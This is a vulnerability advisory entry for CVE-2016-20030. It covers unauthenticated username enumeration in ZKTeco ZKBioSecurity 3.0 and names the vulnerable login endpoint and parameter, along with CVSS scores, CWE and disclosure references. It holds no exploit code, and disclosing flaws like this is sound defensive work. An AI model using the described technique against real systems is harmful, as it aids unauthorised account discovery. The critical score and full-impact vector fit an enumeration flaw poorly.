CVE-2016-20030
CRITICAL Exploitation: PoC
9.8
CVSS 3.1
Description
ZKTeco ZKBioSecurity 3.0 contains a user enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by submitting partial characters via the username parameter. Attackers can send requests to the authLoginAction!login.do script with varying username inputs to enumerate valid user accounts based on application responses.
Metadata
Severity & Metrics
9.8
CRITICAL CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SSVC — CISA Coordinator
Affected products (1)
| Vendor | Product | Platform | Versions |
|---|---|---|---|
| ZKTeco Inc. | ZKTeco ZKBioSecurity | — | 3.0.1.0_R_230 |
Weakness (CWE)
| CWE | Source | Description |
|---|---|---|
| CWE-551 | cna | Incorrect Behavior Order: Authorization Before Parsing and Canonicalization |
CVSS scores (2)
| Score | Severity | Version | Source | Vector |
|---|---|---|---|---|
| 9.8 | CRITICAL | 3.1 | cna | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 9.3 | CRITICAL | 4.0 | cna | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
References (4)
- Zero Science Lab Disclosure https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php
- IBM X-Force Exchange https://exchange.xforce.ibmcloud.com/vulnerabilities/116485
- Packet Storm Security https://packetstormsecurity.com/files/138573
- VulnCheck Advisory: ZKTeco ZKBioSecurity 3.0 User Enumeration via authLoginAction https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-user-enumeration-via-authloginaction